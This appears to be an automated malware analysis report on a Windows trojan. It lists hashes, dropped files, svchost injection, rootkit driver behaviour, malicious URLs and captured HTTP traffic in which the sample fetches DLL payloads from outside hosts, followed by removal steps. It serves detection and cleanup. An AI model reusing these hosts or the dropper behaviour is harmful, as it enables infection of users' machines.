HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.189562 (B) (Emsisoft), Gen:Variant.Zusy.189562 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 28a66abbba0c025bb16c23a49e05c785
SHA1: 93e57e0e0e26f1f88733b138d898dd9b70fd2d09
SHA256: 59b5736b1d08741c35f2f518cdc7aaac2b3dbe2153eb8f451ca6f4d5d8fd96c6
SSDeep: 24576: /0wlANZpZmUJei4KDZb qhwO19/3BM57A7Wm05w/6a4wzt08:UmNZO7gFbhwaBU7mWm058J08
Size: 999936 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 13:00:27
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3652
The Trojan injects its code into the following process(es):
svchost.exe:3884
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:3652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\WuVaOIS.dll (12 bytes)
C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes)
The Trojan deletes the following file(s):
C:\Windows\WuVaOIS.dll (0 bytes)
Registry activity
Dropped PE files
MD5 | File path |
---|---|
3b24050ce849ea9f15363027d11ada2b | c:\ProgramData\gFThJOXu\svchost.exe |
3b24050ce849ea9f15363027d11ada2b | c:\Users\All Users\gFThJOXu\svchost.exe |
158b710a2ce07e3a34e46118f2ad39f2 | c:\Windows\DFaqsb\GBhKYDvG.dll |
941f0ec0a5255964542529dde706f296 | c:\Windows\DFaqsb\ifqSYmg.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\147d3a\r82JCzanHAa.sys" the Trojan controls operations with a system registry by installing the registry notifier.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3652
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\WuVaOIS.dll (12 bytes)
C:\ProgramData\gFThJOXu\svchost.exe (9754 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 1236992 | 989184 | 5.54503 | add7259d069c2588cedcb196d25d6fbe |
.rsrc | 1241088 | 12288 | 9728 | 4.42852 | 6676c143b55ed5405b8bceb81ae28187 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.58sky.com/index/getcfg?id=20297 | 119.97.143.41 |
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll | |
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll | |
hxxp://www.58sky.com/index/getcfg?id=3 | 119.97.143.41 |
hxxp://5636.ecoma.ourwebpic.com/ | |
hxxp://so.qh-lb.com/ | |
hxxp://cdn.sp.cdntip.com/ic.asp | |
hxxp://175.haodns123.cc/ | |
hxxp://175.haodns123.cc/css/style.css | |
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js | |
hxxp://175.haodns123.cc/js/jscript_jquery.faded.js | |
hxxp://175.haodns123.cc/images/top-ban.jpg | |
hxxp://175.haodns123.cc/ad.js | |
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js | 14.29.32.98 |
hxxp://www.ip138.com/ | 87.245.198.83 |
hxxp://www.175sf.com/ | 14.29.32.98 |
hxxp://www.175sf.com/js/jscript_jquery.faded.js | 14.29.32.98 |
hxxp://www.go890.com/d2/CDClient.dll | 87.245.198.83 |
hxxp://1212.ip138.com/ic.asp | 42.236.125.44 |
hxxp://www.175sf.com/images/top-ban.jpg | 14.29.32.98 |
hxxp://www.175sf.com/css/style.css | 14.29.32.98 |
hxxp://www.go890.com/d2/x86.dll | 87.245.198.83 |
www.haosou.com | 180.153.234.170 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 19:47:33 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 31 Oct 2016 07:09:49 GMT
Content-Type: application/octet-stream
Content-Length: 863232
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................(...........S.......@....@.........................................................................<O..P....@..m....................p......................................................................................CODE.....0..............PEC2^O...... ....rsrc....0...@...".................. ....reloc.......p.......*..............@.......................................................................................................................................................................................................................................................................................................................................................................................................................b.. .........c....X.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...|x.o-.l{..L.&..T.]..%?.....3#.T.z.J?....u......_...Hva@l.7d.@..U.....G."a..z..i..L..L..',....../..|D...........1z..o>.hg5m._.........7....},|.o......z.Rwa...l..a.....~"\\Z}.......1..L3....!..6.KW...]h....l7
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Mon, 31 Oct 2016 11:05:03 GMT
Content-Encoding: gzip
3d35.............}.s.Y.............!.....D..{...vj..gwbc....$.2...3.if.?.......aC.v.$..... . ...#.....].r.Q.Ue.*..yH..-......nW..2./...s.9..sO../...O..._.4.a........?.uu......==........>...x._.......f.A.......w..4f...==....Q..`......1....W^v.k.......?...r.c.:.....!.r9s9.c.B.........[}..=..........?..Qw....S]f......9O.Q.Mj...>...v.z.>f.Y.>...73........o....]z...1...Ff'..Jv.......=.3;.OH..~.....=......a......G.F....^...k~.K.Ii..@..x.1.9.a...g..R:.y..2....].....?....E..........k;1...x"q..[.JW'.X.I.n,...\.<i}.f.B..t..Sw.W...Z..-..5|.........U..i.C<.Q....Gi2....:5.~..3.r.........*.o......~..'.~.).dT.w.4...{...9..8.M.{.B..V.....|.A.y....'{.{4..._.R...t..~..?=.o. .s....?......c]..|...L3.....?......=.z./...q..O....gC...F.=.S..&z...#...a..<.[_.1...9.E?.......o.G.....u.V...aZ..Q#..c.=M\....{?.}....h.......~E..M1.*........[....2.'....2...=J..l.V......R...........!.%...XN....W&......N........>k1.N.G.?.. .*..>....#.=....V.2..u...| .q.b3s.G....Tku...Q./...;.#....._.=v.9.....w...O...K....].........o.9.Q.F....T...(..ib*....g.t..Pe.......0J.T;<P..vX1.6...u.)..12..W..............M.8............_..5...5...u..S..w2Pt......x..N.......L.v?..n%V..,o .s.. 8..mEun.....EX....m...B.....0..J..........).s......Yz...@..(..>s..#.......B.......\.z..._..&...V.....&...:...T..V.j#.YE....,..9...*.JQ. ...........p:..|06...|lV....Q...9.E.....G..j.....R...F.J.~.....JUy_.....f..;...}.... .)G.t..........<.c..$....M.wR..../..x.............o8....7. ...,.y.7.S.... 2;.s....o.._..V.q.....]h.*D..h;I..K..s....L(k8A...[...=
<<< skipped >>>
GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 19:47:36 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L...]..W...........!......................................................................@.................................................................|...........................................H...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<......<...q........L....o.d....E.......M........Y_^[..]........p.....Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^...e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>
GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
HTTP/1.1 200 OK
Date: Mon, 31 Oct 2016 03:42:55 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Thu, 27 Oct 2016 03:33:45 GMT
Accept-Ranges: bytes
ETag: "4a8df4eb230d21:446a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 66207
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta name="mobile-agent"content="format=html5; url=hXXp://m.ip138.com/">..<title>IP........--.................. | ............ | ............ | ........................</title>..<meta name="Keywords" content="ip,IP....,IP........,ip138">..<meta name="Description" content="ip,IP....,IP........,ip138">..<script language="javascript">..<!--..if(window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/';..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("http://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>
GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:22 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......
<<< skipped >>>
GET /js/jscript_jquery.faded.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:22 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:20 GMT
Content-Encoding: gzip
73d.............X.n.6..V....y.];.......[Vt.z......%.f K*E%M.?...H{..<H"e.I..b..K...?.........{.a...K.,|...1..g..5*.j.3..%..,C.k...-..kFE..@oo.,...Lo.f'.....=Q4..</...l%"..=..~..!2.5...U4E)...%...&..2....".............4'h..g.<G..x.5L.6..Z.T.u.j..|%..v...I.(..J..J.J...r[...).Mj`.._.y].|]S<X".._..%x.n.....YWY,y...Y.F.:..g.@B..qX....P?....K*P.....DK4jN..H.i....*......s^0Y..L....xK.r.0l8....!.e.).J.....,.5..k$.@DA...F.6d.oy.....er{._.|.}.\..c.&TR...c..T..Dd<FQ....\B`.b....%....6.&@7..B.K..U....~. .g%.lg.. %..{..d.R3.y.i..2.`.K6...k.Oc....j......C.....w.h.,....qYL.tE...m.P.p^.D9.........!J..f.V<..O...oal...W.3}.......A....:"T..^....s.R.UM..,...K......./W.......4 .%P3....B..A.;T.v...-.i.j.'.eV{...."..8..3h...e.$.>.Y...-..1....4rI..z.b..G..R.y...P..)*.!6.a... khQ@.........6....QS.;.......S O.p..A..]~.q...k..cgg.>B).I..5...)hU2/......MqB ..).v.h.7|...|jJ...V.(U5Y..........&...Q..V5....O..G.z.....C.....eIn....o..K..ax.....>.pk..U...dx.l.l.*..B..R.4._. .>{K./.F.. lp...H0%T..ej...h....1....p.i3.......]..qm4.x.9.gAa..J_.g O.~.......U......O\..>;=..3....;......a..OGr..M..)....c..&.m.[/....at.'.....|zBA 8...X....n..~....3D...p.U.Q..$9WF!..K.. ........Lw.^....XTJAT.`.....gzz....-.....&F{.B.I.V........D.$..e...3...%s.1..%...F.(.0..Hut......P..K.c.%.x..w.K.....=dD..)Q..x0.L.L...V0*.....?v...I.1...E\...q'..........5.v.../2e........t ...C..X.10.o%h..Sl..v... W|..~...P{He...8.E.'W...j8o.{N'.;s..x....]..w......=.x.....s..a/.|.a..K..l.Gw...Q.)....-.n....n....z|t...ni.z.S......}........lZk.pq.......r..
<<< skipped >>>
GET /images/top-ban.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Oct 2016 22:06:23 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 14 Jun 2016 07:38:00 GMT
Content-Encoding: gzip
6218..............UT.Z.$..C. ..{c....qMpw...........4......w............>.>..:...{..io.K.@^.....?x.....0................N......:..M@...............4...._...........b........a. ......... dT$.4x.D .....CBF@D...................?d..w....K(qpA..T`qj<u.N.n.|^S3M-m..s.B4...".....G...6..............?.`#.(q.....M.p].9@(.E...&(......S.M|WI......n....:...b.c.'n......m........6.....{..R.O..cX.;..B. ......`#jf....."M..Jh..JJ9..$w...[..........5..w.$.I.x.SH.WF!.i....(W...[........L..].$...A......\./.\...y].......4....9..FA'r....|.Q.(@D!......ri%.`.i/...O.J.[hY_..D.!..e.Ao...?#.z......&a.F.)..d.....y.\.b#..w... k...f.......z*....O.w9Y#....Z.....h.....E....Aw.....G..J.....t.B..2..a..*....iP....yb.T....T.".....B>q:WF.9B.....vV..j.....7..1..N:1I.T.....S.... |. .|t._.j....F.>..t.........'S..Mg^.H\.C)X8.P..*/....f*m..\W`..AY.....!......*.<0L.Pi...Pg.}Q....DU....E.(.H..K..!....O.....y...%..@Mk.W.j..3..?..U'.<.V....:._..2.'........;P.gyiy......j....v..E".U.....S.....h.$}:./.E`,.u.a}SN.u.<.._.Ma....P....G"...}.). .2......R...]m.3.....;.G..w@.4..?......<.<.!.6dY.d.G................-t.Zt.`t..w-.c....R.m.;#../..k-....8....t..@,.Hf....B....a........$j.j.PH.............&4H.. Hu...0....J.../..{E....a.. .fo...1w..Y`..J$..1/.#.Z.,..l.......S.....Di....#..o%..Fs..C.8._.z.?...~.G.@.9.J.....w....j4)....Q..v}..T..J.#5..#`.... ......PK....r..........G..9.YWJ) ?..,....tPZ..@.....<...s..k%.iO.....j..... .a....!...m.K.=.XfI{ .\.k.`R...)w....3........._..j...U....]..........x....B...q@R....GS...8.."rR...D*.BlD#..'h.e\
<<< skipped >>>
GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Mon, 31 Oct 2016 22:06:23 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQCADBBT=LDKBNLNDPEHJBOIGFEEMOIKD; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..
GET /index/getcfg?id=20297 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Mon, 31 Oct 2016 22:06:11 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=8mnufegj6miu4d5l91jggmuur5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
ed0..............ms.8..<...S..0..L...u{..Mb.M{.....6 ..m|......"...];...ew..Z..I...vb.Lwp..$$...........!c......t..uCD....$.?}..3.g....>..C.<...$.t.H...).b.t.....!>i....._0`!E.../\#0...`.....m...>@0./1.........n4.T....x."..(8.;...[.Otx..=...zc...."....O........l..-c..o.n..1n..!.i.....8.>..G........F..3| 0..&......^..5{...... ...k.'V.@...v......@.x...f....P....Ju....P...'_.t..sc.e....3J......=...M.....f.b......b..T..W.a...x.....[0j9.*.IF..GQHj.AA...ME./......{.....))..U.Lw..@.8.q.........._\.. ..n...(:(A...kK..l..`..H..5....0..i.km.L..../......X,9.Q..B..M........v.......%..2.*%..h.Q......JPJ....6.|..,A..$..wr!.(....H...y1..%!..c..F..q.=...0t.j..)...1~.2.S]...~.......5|......C...@R%nc`.@..H.rB..........2I.=.......Th...)...C...R.v.q..Q.[9..#..#.5......a.S..Mt.....E.ad*..B)0.,Q...../<..)..K..=...<
&
&
&
&
&c
&c
&
&
&Error
&Error
&tn
&tn
&tn
&tn
&unc
&unc
&vendor
&vendor
&
&
&
&
&
&
&a
&a
&
&
&
&
<.iv>
<.iv>
&
&
&&
&&
&
&
&
&
&
&
&Error
&Error